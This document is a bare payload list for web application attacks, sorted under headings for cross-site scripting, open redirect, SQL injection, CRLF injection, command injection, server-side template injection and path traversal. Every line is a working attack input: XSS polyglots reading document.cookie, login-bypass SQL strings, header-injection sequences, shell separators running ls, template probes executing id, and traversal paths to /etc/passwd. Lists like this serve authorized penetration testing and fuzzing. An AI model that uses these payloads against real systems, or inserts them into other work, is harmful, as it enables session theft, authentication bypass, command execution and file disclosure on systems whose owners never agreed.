
#XSS
''><script>alert(document.cookie)</script><!--//
</script><script>alert(document.cookie)</script><!--//
"</script><script>alert(document.cookie)</script><!--//
    jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
"><script>alert(document.cookie)</script><!--//

#OPEN_REDIRECT
<AUX_SERVER>
\\<AUX_SERVER>
@<AUX_SERVER>

#SQLi
444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/#
SLEEP(1) /*’ or SLEEP(1) or’” or SLEEP(1) or “*/
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*

#CRLFi
/%0d%0aLocation:%20<AUX_SERVER>
%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
//<AUX_SERVER>/%2f%2e%2e%0d%0aheader:header
%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E

#COMMAND_INJECTION
;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)

#SSTI
${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
<%=`id`%>
${{7*7}}
{{7*'7'}}
#{7*7}
{{7*'7'}}

#PATH_TRAVERSAL
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
